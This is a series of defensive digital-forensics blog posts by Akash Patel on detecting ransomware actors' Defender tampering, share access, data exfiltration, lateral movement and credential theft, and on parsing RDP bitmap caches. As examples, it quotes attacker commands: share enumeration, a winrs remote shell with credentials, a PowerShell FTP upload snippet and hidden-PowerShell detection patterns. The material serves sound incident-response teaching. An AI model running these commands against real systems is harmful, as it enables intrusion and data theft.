message:"*Set-MpPreference*" AND (message:"*Disable*" OR message:"*Reporting*" OR message:"*SubmitSamplesConsent*" OR message:"*DefaultAction*") T1562.001-Windows Defender Exclusions Query: (parser:"winreg" AND key_path:"*Windows Defender\\Exclusions\*" AND NOT message:*empty*) OR (parser:"winevtx" AND event_identifier:"5007" AND message:*Exclusions*) T1562.004-Windows Firewall Disabled Query: parser:"winreg" AND (display_name:*SOFTWARE OR display_name:*SYSTEM) AND (message:"*EnableFirewall: [REG_DWORD] 0x00000000*" OR message:"*EnableFirewall: [REG_DWORD_LE] 0*") T1562.004-Windows Firewall Rules Query: (parser:"winreg" AND key_path:"*FirewallRules*") OR (parser:"winevtx" AND source_name:"Microsoft-Windows-Windows Firewall With Advanced Security" AND event_identifier:"2005") Timezone Query: parser:"winreg" AND key_path:"*Control\\TimeZoneInformation*" Windows Network Adapter Details Query: parser:"winreg" AND key_path:"*Tcpip/Parameters/Interfaces*" AND NOT message:*empty* Windows OS Version Query: parser:"winreg" AND data_type:"windows:registry:installation" Windows Patch Installation Success Query: parser:"winevtx" AND source_name:"Microsoft-Windows-WindowsUpdateClient" AND display_name:"*System\\.evtx" AND event_identifier:"19" Windows User Profiles Query: parser:"winreg/winreg_default" AND key_path:"*ProfileList*" These queries form the backbone of effective threat detection and forensic analysis. Happy hunting! Akash Patel

Ransomware attacks continue to evolve, with actors using advanced tactics to access and exfiltrate sensitive data. Understanding their methods is crucial for preventing and mitigating the damage they cause. 1. Data Access: Network Shares – Enumerated and Reviewed One of the primary targets for ransomware actors is your network shares. To find and exploit them, attackers use various tools, such as: VeilFramework's Invoke-ShareFinder cmdlet:  This tool allows a ttackers to enumerate network shares within a domain. You can explore the tool or test its capabilities by visiting its GitHub repository at Veil-PowerView's Invoke-ShareFinder . SharpShares:  Another popular tool among ransomware actors is SharpShares, which queries all hosts in a domain and checks the current user's access to shares . You can find more about SharpShares at SharpShares GitHub . Example commands from the leaked Conti chat logs illustrate how these tools are used: 1. Invoke-ShareFinder -Domain [domain_name_here].local | Out-File sharfindINFO.txt 2. SharpSharesNG.exe shares Attackers may also map shares directly using legitimate tools and commands, like: net use * "\\192.168.168.10\Shares" /persistent:no /user:DOMAIN\username To detect such share access attempts, two essential event IDs should be enabled: Event ID 5140:  A network share object was accessed. Event ID 5145:  A network share object was checked to see if the client could be granted access. These events can be enabled with the following command: auditpol /set /category:"Object Access" /success:enable Enabling these events allows you to monitor share access and changes, offering insights into potential data exfiltration activities. 2.   Identifying Network Share Access via the Registry Network share access can also be traced through various registry keys: Mapped Network Drive Most-Recently Used (MRU) items: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Map Network Drive MRU Mapped Network Drives (Network Drive Wizard): HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 Items Typed into Windows Explorer: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths Items Typed into the Windows Run Dialog: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU All Open Shares on a System: HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Shares 3. Forensic Analysis of File and Folder Access From a forensic perspective, identifying which files or folders were accessed is crucial. Here are some key artifacts to examine: Open/Save MRU, Recent Files, Shellbags, LNK Files, Last-Visited MRU, Office Recent Files. For Files or folders were accessed, refer to my previous blog posts: Artifacts for File Opening & Creation (Part 1): Open/Save MRU, Recent Files, Shellbags Artifacts for File Opening & Creation (Part 2): Last-Visited MRU, Office Recent Files, LNK Files To identify deleted files or evidence of file access, explore these links: Artifacts for Deleted File & File Knowledge (Part 1): ACMRU, Last-Visited MRU, Vista/Win7/10 Artifacts for Deleted File or File Knowledge (Part 2): Search, WordWheelQuery, Index.dat File 4. Registry Artifacts: TypedPaths & TypedURLs TypedPaths can reveal user activity within the Windows Registry: TypedPaths:  Insights available at Part 1: Windows Registry Artifacts - Insights into User Activity TypedURLs are stored in the following registry path: NTUSER.DAT\Software\Microsoft\Internet Explorer\TypedURLs TypedURLs store locations entered into the Internet Explorer/Edge address bar, similar to TypedPaths. Data Exfiltration 1. Data Exfiltration: Staging and Compression Before exfiltrating data, ransomware actors typically compress the data into archive files. Common formats include .zip, .7z, and .rar. Adversaries often use tools like 7za.exe or rar.exe to perform these actions. Be alert for these file types in your network, especially .rar files. Native compression methods that can be leveraged include: Compress-Archive cmdlet tar command Send to > Compressed folder 2. Data Staging Attackers often prepare data for exfiltration by copying files to a staging directory, typically a temporary folder. Files may be copied, renamed, or bundled into archives. These operations might go unnoticed unless specific alerts are configured. When reviewing a system for potential data staging , you want to focus on archive creation. Analysis of the MFT and UsnJrnl can prove extremel y useful in this endeavor. Reviewing Sysmon Event ID 11 (File Creation) can be very useful, as you can see the exact size of any archives created. 3. Creation of Multiple Text Files Adversaries may redirect tool outputs to text files since text files compress well, reducing the size of exfiltrated data significantly. By converting large files into text format, gigabytes of data can be reduced to mere megabytes, making exfiltration easier and less detectable. Note: Adversaries (especially in ransomware cases!) often will delete the archives they have exfiltrated. They do not want you to have access to what they stole. In this case, you may need to rely on $UsnJrnl:$J analysis. You might ask question  If you have $mft why you need to rely on $UsnJrnl:$J analysis, to identify data exfiltration? Answer is  1. While $MFT provides a snapshot of the file system at specific points in time, the $UsnJrnl:$J tracks file system events in greater detail over time 2. Exfiltration might involve subtle modifications, renaming, or deletion of files. The $MFT might not capture all of these events, while the $UsnJrnl:$J can give you insights into every file operation, which is crucial for detecting sophisticated exfiltration techniques. Example: If an attacker creates a zip file to bundle exfiltrated data, the $MFT will record the creation of that zip file . However, the $UsnJrnl:$J will log the sequence of events , like file additions to the zip, the exact time of zipping, and any renaming or moving of the file before exfiltration. 4. WinZip, 7-Zip, and WinRAR Artifacts Adversaries frequently use popular tools like WinZip, 7-Zip, and WinRAR to compress and archive data. These tools leave traces in the registry, which can be useful for forensic analysis: WinZip Registry Path : NTUSER.DAT\Software\Nico Mak Computing\WinZip\ 7-Zip Registry Path : NTUSER.DAT\Software\7-Zip\ WinRAR Registry Path : Located in the user's NTUSER.DAT hive, this data can provide valuable information about archives created or manipulated during the incident. 5. Detecting Renamed Executables Ransomware actors often rename executables (PE files), but they rarely edit the file's VERSIONINFO resource . This metadata includes fields like Description, Product, Company , and OriginalFileName . The OriginalFileName can be particularly useful for threat hunting. You can query identify these executables in Sysmon Event ID 1, Security Event ID 4688/4689, or via your EDR if deployed. Cloud-Based File Sharing Sites Adversaries might use cloud services like MEGA, SendSpace, WeTransfer, Google Drive, Dropbox, Box, OneDrive, or cloud-based storage buckets such as AWS, GCP, and Azure. Blocking unauthorized access to these platforms can prevent exfiltration. The "Living Off Trusted Sites" (LOTS) project catalogs sites used for malicious purposes, including data exfiltration and phishing. You can explore the LOTS project. https://lots-project.com/ FTP/SFTP Exfiltration Despite FTP being an insecure protocol, it remains a popular choice for data exfiltration. FTP uses ports 20 and 21, while SFTP uses port 22. Tools like WinSCP and FileZilla are often employed by adversaries: FileZilla Log Locations : %APPDATA%\FileZilla\filezilla.xml %APPDATA%\FileZilla\recentservers.xml %APPDATA%\FileZilla\trustedcerts.xml %APPDATA%\FileZilla\sitemanager.xml %APPDATA%\FileZilla\*.sqlite3 Example of PowerShell code used for FTP data transfer $FTPRequest = [System.Net.FtpWebRequest]::Create("$RemoteFile") $FTPRequest = [System.Net.FtpWebRequest]$FTPRequest $FTPRequest.Method = [System.Net.WebRequestMethods+Ftp]::UploadFile $FTPRequest.Credentials = new-object System.Net.NetworkCredential($Username, $Password) $FTPRequest.UseBinary = $true $FTPRequest.UsePassive = $true 2. WinSCP Registry Artifacts WinSCP, another popular file transfer tool, leaves traces in the registry that may help in detecting exfiltration: Registry Paths : HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Configuration\CDCache HKCU\Software\Martin Prikryl\WinSCP 2\Configuration\Logging HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Configuration\History\LocalTarget HKCU\SOFTWARE\Martin Prikryl\WinSCP2\Configuration\History\RemoteTarget 3. RDP Exfiltration Exfiltration through Remote Desktop Protocol (RDP) is challenging to detect , as Windows does not log what files are copied out of the network. However, RDP clients can map local drives to remote sessions, creating shares such as \\tsclient\C\. These UNC paths may appear in process creation events or command lines. (i). RDP bitmap cache parsing is a longshot when it comes to identifying potential exfil. 4. Rclone – The Ransomware Actor’s Little Buddy Rclone, a synchronization tool compatible with over 40 services, is often used by ransomware actors for data exfiltration. Adversaries usually do not rename rclone.exe or rclone.conf, making them easier to detect. You can learn more about Rclone and its supported services on its https://rclone.org/docs/#config-config-file the list of https://rclone.org/#providers 5. Power Consumption as a Detection Method Data exfiltration can be associated with high power consumption. Transferring data requires power for the network interface and the transferring program. Tools like Rclone and MEGAsync might show up in power efficiency reports stored at C:\ProgramData\Microsoft\Windows\Power Efficiency Diagnostics. The SRUM database has also proven useful for power consumption analysis, which can help identify suspicious exfiltration activities. You can explore SRUM further in the following posts: SRUM: The Digital Detective in Windows How to Use SRUMECmd to Parse and Analyze SRUDB.dat Files 6. MEGAsync IOCs MEGAsync, another tool often used for exfiltration, leaves behind artifacts that could aid in investigation: Scheduled Task Name : \MEGA\MEGAsync Update Task Config File  (encrypted): %LOCALAPPDATA%\Mega Limited\MEGAsync\MEGAsync.cfg Executable : %LOCALAPPDATA%\Mega Limited | %LOCALAPPDATA%\MEGAsync Log Files : %LOCALAPPDATA%\Mega Limited\MEGAsync\logs\ Registry Setting : HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{CLSID of Mega}\Instance\InitPropertyBag\TargetFolderPath 7. LockBit’s StealBit Tool LockBit ransomware operators have developed a custom exfiltration tool called StealBit, known for its high efficiency and speed. For a deep dive into LockBit’s arsenal and the StealBit tool, check out Cybereason’s threat analysis report . 9. Network-Based Exfiltration Detection While network logs such as firewall and NetFlow logs can help determine the amount of data exfiltrated, they do not reveal the content. Look for traffic spikes, off-hours activity, or protocol tunneling (e.g., DNS) as indicators of potential exfiltration. Though it may be difficult to prove what exact data was exfiltrated, tracking these indicators can provide valuable leads in your investigation. Be vigilant, keep learning stay safe Akash Patel

Lateral movement refers to how attackers move through a network after gaining initial access. This allows them to explore the environment, escalate privileges, and reach their final target, often sensitive data or critical systems. Lateral movement is hard to track due to the variety of methods used. Common Lateral Movement Protocols Server Message Block (SMB) : Used for file sharing over the network. TCP ports 137, 138, 139, and 445 are utilized. Tools: PsExec  (SysInternals), smbexec  (Impacket). Event IDs to monitor: 5140 : A network share object was accessed. 4688/4689 : Process creation (Sysmon Event IDs 1 / 5). 7045/7036 : Service creation and status changes. Remote Desktop Protocol (RDP) : Enables remote access to systems. Attackers often add themselves to the “Remote Desktop Users” group. Monitor for Event ID 4728 : "A member was added to a security-enabled global group". RDP Cached Bitmaps: RDP clients store 64x64-pixel bitmap tiles, which are cached by default. These cached images can be obtained and parsed for forensic analysis. I have created an complete blog to analyze RDP Cached Bitmaps (Do check it out to learn more Link below) https://www.cyberengage.org/post/analyzing-and-extracting-bitmap-cache-files-from-rdp-sessions Windows Remote Management (WinRM) : Microsoft’s implementation of the WS-Man protocol. WinRS (Remote Shell) is commonly used in ransomware campaigns. Monitoring: Check for command lines such as winrs.exe -r:target /username:admin /password:pass. Tools like SharpSphere can compromise vSphere infrastructure through WinRM . Windows Management Instrumentation (WMI) : Allows for administrative tasks on remote systems. Often abused by ransomware operators to execute commands or transfer files. Background Intelligent Transfer Service (BITS) : Used for downloading files in the background. Attackers utilize BITS for stealthy data transfers and task execution. Tools Commonly Used for Lateral Movement Ransomware operators and threat actors use a variety of scanners to identify targets for lateral movement: Advanced IP Scanner Advanced Port Scanner Angry IP Scanner Cobalt Strike (built-in scanning capabilities) KPort Scanner nmap Qfinder Pro SoftPerfect Network Scanner Detailed Protocol Insights Server Message Block (SMB) SMB is a primary target for lateral movement. PsExec, for instance, is a popular tool for running processes remotely: PsExec Process : Opens an SMB session to the target. Uploads PSEXESVC.exe  to the ADMIN$ share. Creates a named pipe( Example:- \\client\pipe\svcctl) to talk to the Service Control Manager (SCM). Calls CreateService using the newly uploaded PSEXESVC.exe as ImageFile. Calls StartService to run the service. Detection: File Creations : Monitor for the creation of PSEXESVC.exe. Registry Key : The EULA acceptance is stored in the registry at HK_USERS\[SID]\Software\Sysinternals\PsExec\EulaAccepted. Additional reading on PsExec and SMBexec: Windows Lateral Movement with smb, psexec and alternatives. https://nv2lt.github.io/windows/smb-psexec-smbexec-winexe-how-to/ Remote Desktop Protocol (RDP) For RDP-based lateral movement: Group Membership : Check Event ID 4728 when users are added to the “Remote Desktop Users” group. Bitmap Cache : RDP client stores bitmaps locally, which can be parsed using tools like RdpCacheStitcher, EnCase, and BMC Tools. These tools can help reconstruct images that were viewed during the session, potentially revealing sensitive information. Detecting and Hunting Lateral Movement Detecting PsExec Activity : Process Creation Events : Event IDs 4688/4689   (or S ysmon Event IDs 1/5) . Service Creation : Event IDs 7045/7036  for PSEXESVC, File creations (Sysmon Event ID 11) Registry Monitoring : Look for EULA acceptance in the registry. File Creations : Track the creation of PSEXESVC.exe. Detecting smbexec Activity : Lucene-based queries can help identify smbexec usage. For example: • CommandLine:"powershell.exe -NoP -NoL -sta -NonI -W Hidden -Exec Bypass" • CommandLine:("\\127.0.0.1\C$\__output" OR "127.0.0.1 AND __output") • CommandLine:"%COMSPEC% AND /Q AND /c" • CommandLine:"%COMSPEC%" • FileName:("execute.bat OR __output") • EventID:7045 AND ServiceName:"BTOBTO" To learn more about hunting for Impacket/smbexec, see Riccardo Ancarani’s “Hunting for Impacket” article here: https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/ Ransomware Evolution: Expanding Beyond Windows Ransomware groups are increasingly targeting non-Windows platforms, including Linux, macOS, and virtualization platforms like VMware's vCenter, vSphere, and ESXi. Attacks on vSphere Infrastructure : Tools like SharpSphere  allow attackers to gain control over vSphere infrastructure. Attackers can list VMs, dump memory, or execute code on virtual machines. Targeting ESXi Servers : Attackers exploit vulnerabilities in ESXi servers to encrypt multiple VMs simultaneously. Examples include using custom Python scripts to target ESXi servers. Ransomware-as-a-Service (RaaS) and ESXi Payloads : RaaS platforms like LockBit 3.0 and BlackBasta are generating native ESXi ransomware payloads, making it easier for attackers to target virtualized environments. Incident Response and Forensics on Non-Windows Platforms Manual Artifact Collection: Before mid-2022, collecting forensic artifacts from ESXi and other Unix-like systems was mostly manual, making it a time-consuming process during incident response. Unix-like Artifacts Collector (UAC): Developed by Thiago Canozzo Lahr, this tool automates the collection of system artifacts from various Unix-like operating systems, including ESXi, Linux, macOS, and others. This automation improves the speed and efficiency of incident response efforts. Learning Resources: Leonard Savina's presentation attaching below Thiago Canozzo Lahr's presentation attaching below  Conclusion: By covering all key protocols, tools, detection techniques, and the latest ransomware trends, this blog provides a comprehensive understanding of lateral movement and how to defend against it. Stay vigilant, and make sure to incorporate the detection strategies discussed to protect your network from lateral movement attacks. Akash Patel I have created an blog and a pdf file which will help you investigate artifact in source system and destination system. The pdf contain detection or analysis based on Event IDs as well as based on File system artifact link below: https://www.cyberengage.org/post/understanding-lateral-movement-in-cyber-attacks

LNK (Shortcut) Files: LNK files are Windows shortcut files that contain metadata about the file or program they link to. They can reveal information such as the target file's path, icon location, creation time, and last accessed time. Useful for understanding user behavior, application us age patterns, and potentially identifying executed files. Prefetch Files: Prefetch files are used by Windows to optimize the loading time of frequently accessed programs. They contain metadata about the execution of programs, including the program's name, path, last run time, and frequency of use. Valuable for identifying frequently executed programs and estab lishing user activity patterns. AMCACHE (AMCache.hve): AMCACHE is a Windows registry hive that stores information about program executions and installations. It contains details such as program names, paths, execution counts, first and last execution times, and digital signatures. Provides insights into program execution history, in cluding newly installed software and potentially malicious activities. Shimcache: The Shimcache, found in the Windows registry , maintains a record of executed programs, even if they have been deleted or moved. It includes information such as program paths, last modified timestamps, and execution counts. Useful for identifying executed programs, even if th ey were attempted to be concealed or removed. Note for Shimcache : - Shimcache tracks files that were executed as well as executables that were browsed via File Explorer . Shimcache is located within memory and is written to the registry upon shutdown. This is important to note when collecting a triage image from an online system. If the machine has been running without any reboot/restart/logoff, this artifact will not be available. Shimcache order of execution: Shimcache stores the most recently executed or interacted with files at the top of the registry key. By sorting on the Line column, we're able to view the executables in chronological order, regardless of the file modification timestamp. Jump Lists: Jump Lists are a feature of the Windows taskbar and Start menu that provide quick access to recently or frequently used files and programs. They store information about accessed files, including file names, paths, timestamps, and usage frequency. Helpful for reconstructing user activities , identifying accessed files, and understanding user preferences and behavior. Shell Bags: These structures store information about which folders were most recently browsed by the user , including details such as folder view settings and the last time a folder was visited or updated.

In the realm of cybersecurity, one of the most targeted areas by adversaries is privileged accounts. These accounts hold elevated permissions, making them high-value targets for threat actors, especially in the context of ransomware operations. Privilege escalation and credential access are two key tactics used by adversaries to gain control over systems. 1. Understanding Privilege Escalation and Credential Access Privilege Escalation (TA0004) Privilege escalation involves an adversary attempting to gain elevated permissions on a system. These elevated privileges enable them to execute commands, install malware, and move laterally across the network. Credential Access (TA0006) Credential access refers to the methods adversaries use to obtain account credentials. These credentials can grant them unauthorized access to systems and data. The most valuable targets are accounts with administrative privileges, such as Domain Admin (DA), Enterprise Admin (EA), and Schema Admin (SA) . Attackers focus on stealing these credentials to gain control over the Active Directory (AD) environment. 2. Best Practices for Securing Privileged Accounts Securing privileged accounts is crucial for minimizing the impact of privilege escalation and credential access attacks. Here are actionable steps to protect these high-privilege accounts: Use Non-Privileged Accounts for Everyday Use Administrators should always use their personal, non-privileged accounts for routine tasks. Elevated accounts, like DA and EA, should only be activated when absolutely necessary and promptly disabled afterward. Enable Windows Defender Credential Guard Credential Guard is a critical feature that helps protect credentials stored in memory from being stolen. While it’s recommended to enable it across all servers, at the very least, it should be activated on critical systems like Domain Controllers (DCs). Learn more about setting up Credential Guar. https://learn.microsoft.com/en-us/windows/security/identity-protection/credential-guard/configure?tabs=intune Utilize the Protected Users Group Place all service accounts, admin accounts, and high-privilege accounts (DA/EA/SA) into the Protected Users group in AD . This limits their exposure to attacks. Learn more about the Protected Users group. https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/protected-users-security-group Service Account Privileges Service accounts should only have the minimum privilege s required for their function. Be wary of vendor recommendations suggesting excessive privileges for their service accounts. Challenge them and ensure security is prioritized. Avoid Over-Privileged Service Accounts Do not allow vendors to dictate security within your organization by granting over-privileged access to their service accounts. Many ransomware incidents stem from the abuse of such accounts. 3. Local Administrator Password Solution (LAPS) Microsoft offers a free solution known as Local Administrator Password Solution (LAPS) , which is vital for managing local administrator accounts securely. By deploying LAPS, you can significantly reduce the risk of ransomware and other types of attacks that target local admin accounts. Learn more about LAPS. https://www.microsoft.com/en-us/download/details.aspx?id=46899 4. Mitigating Attacks on LSASS and NTDS.dit LSASS (Local Security Authority Server Service) LSASS is responsible for handling authentication requests i n Windows environments, and it stores credentials in memory. Threat actors often try to dump the LSASS process to extract these credentials. Here are some common methods used: Task Manager Dump : A straightforward method where attackers use Task Manager to create a dump file of the LSASS process. SysInternals Process Explorer : This tool provides more sophisticated methods for LSASS dumping. PowerSploit’s Out-MiniDump Cmdlet : A PowerShell command that facilitates LSASS dumping. you can create an alerting for lsass.dmp NTDS.dit The NTDS.dit file is the Active Directory database file. Attackers frequently attempt to steal this file from Domain Controllers. Monitoring file creation events (e.g., Sysmon Event ID 11) and analyzing MFT/UsnJrnl data can help detect unauthorized NTDS.dit access. Focus on hunting for instances where this file exists outside its proper location, such as C:\Windows\NTDS\NTDS.dit. 5. Addressing UAC Bypass Techniques User Account Control (UAC) is designed to prevent unauthorized changes by prompting users for consent. However, malware families like Emotet have built-in UAC bypass capabilities. Other tools may require attackers to manually bypass UAC. While UAC is a valuable layer of security, it is not foolproof, and organizations should implement additional controls to mitigate the risks of privilege escalation. Example of UAC: If a user is an administrator on a host, they will receive a UAC-driven prompt that reads, “Do you want to allow this app to make changes to your device?” You are most likely familiar with this dialog box and its associated Yes/No buttons. 6. Final Thoughts: Leveraging Tools to Secure Your Environment To further enhance security, consider adopting Privileged Access Management (PAM) solutions such as BeyondTrust. Additionally, tools like Microsoft LAPS, Credential Guard, and SysInternals can be valuable assets in defending against privilege escalation and credential access attacks. By implementing these best practices, you can reduce the likelihood of ransomware infections and protect your organization from being compromised by advanced attack tactics. Akash Patel

When dealing with Remote Desktop Protocol (RDP) sessions on Windows, one of the often overlooked yet valuable artifacts is the RDP bitmap cache. This cache, designed to enhance performance by storing screen sections that don't change often, can be crucial in forensic investigations. Understanding the Purpose of RDP Bitmap Cache Files The primary purpose of the RDP bitmap cache is to improve performance by caching screen sections that change infrequently. Instead of redrawing the same portions of the screen multiple times during a session, the cache allows the system to pull the image from local storage. This leads to a smoother and more efficient user experience, especially in sessions where certain parts of the screen remain static. However, from a forensic perspective, these cached files can be a goldmine of information. By extracting and analyzing the bitmap cache, forensic analysts can potentially uncover information such as file names, icons, and partial screen contents from an RDP session. Location of Cache Files The cache files are stored in the user profile directory, and their location varies depending on the version of Windows: Windows 7 and later : C:\Users\[user]\AppData\Local\Microsoft\Terminal Server Client\Cache\* Pre-Windows 7 : C:\Documents and Settings\[user]\Local Settings\Application Data\Microsoft\Terminal Server Client\Cache\* Each user profile on a Windows machine will have its own cache files stored in the respective directory. These files contain the cached bitmap data from RDP sessions, making them valuable for forensic analysis. Extracting and Analyzing Bitmap Cache Files Several tools are available for extracting and analyzing these bitmap cache files. BMC Tools Description : BMC Tools is a free and open-source Python script that extracts and analyzes cached bitmap files. It's a powerful tool for forensic investigations, allowing analysts to reconstruct parts of the screen from an RDP session. However, it's worth noting that BMC Tools doesn't automatically reassemble the complete screen. Output will look like below after running above tool Usage : After extracting the cache files using BMC Tools, forensic analysts can manually analyze and piece together the images. The tool's output can help uncover significant details, but it requires careful examination to reconstruct meaningful visuals. GitHub Repository : https://github.com/ANSSI-FR/bmc-tools EnCase Script - "RDP Cached Bitmap Extractor" Description : This script, compatible with the commercial EnCase forensic software, allows for the extraction of cached bitmap images. EnCase is a widely used tool in forensic investigations, and this script integrates seamlessly with its ecosystem. Usage : Using this script within EnCase, analysts can extract and analyze bitmap cache files. However, it requires a licensed copy of EnCase, which may be a limitation for some forensic teams. Limitation : EnCase's script also doesn't reassemble the full screen, but it provides a robust framework for extracting and working with cached data. RdpCacheStitcher Description : This tool, developed by the Bundesamt für Sicherheit in der Informationstechnik (BSI), provides a user interface for creating collages manually from the output of tools like BMC Tools. It's a useful tool for visualizing and manually piecing together cached bitmap files. Usage : After extracting images with tools like BMC, RdpCacheStitcher allows analysts to arrange and stitch together these images into a coherent collage. The interface simplifies the manual reconstruction process. GitHub Repository https://github.com/BSI-Bund/RdpCacheStitcher BriMor Lab’s “rdpieces” Description : rdpieces is a Perl script designed to automatically rebuild screenshots from cached bitmap files. It attempts to automate the tedious process of piecing together bitmap fragments, potentially saving time for forensic analysts. Usage : While not perfect, rdpieces offers a more automated approach to reconstructing screens from cached data. However, the accuracy of the reconstruction may vary depending on the complexity of the cached files. GitHub Repository : https://github.com/brimorlabs/rdpieces?tab=readme-ov-file Output: Challenges in Reassembly One of the significant challenges in working with RDP bitmap cache files is reassembling the images. The cache files aren't written in a linear or predictable order. Various factors, such as mouse movement or screen changes, can affect the order of cached tiles. As a result, reconstructing a complete image from these cached tiles is often compared to solving a jigsaw puzzle. While tools like rdpieces attempt to automate this process, the reconstruction isn't always perfect . Forensic analysts must often rely on manual intervention to piece together significant details such as file names, desktop icons, and portions of the screen background. Conclusion The extraction and analysis of bitmap cache files from RDP sessions offer a unique avenue for forensic investigation. Tools like BMC Tools, RdpCacheStitcher, and rdpieces provide a range of options for working with these cached images, each with its strengths and limitations. While automated reconstruction is challenging, these tools, combined with manual analysis, can help forensic investigators uncover valuable insights from RDP sessions. Akash Patel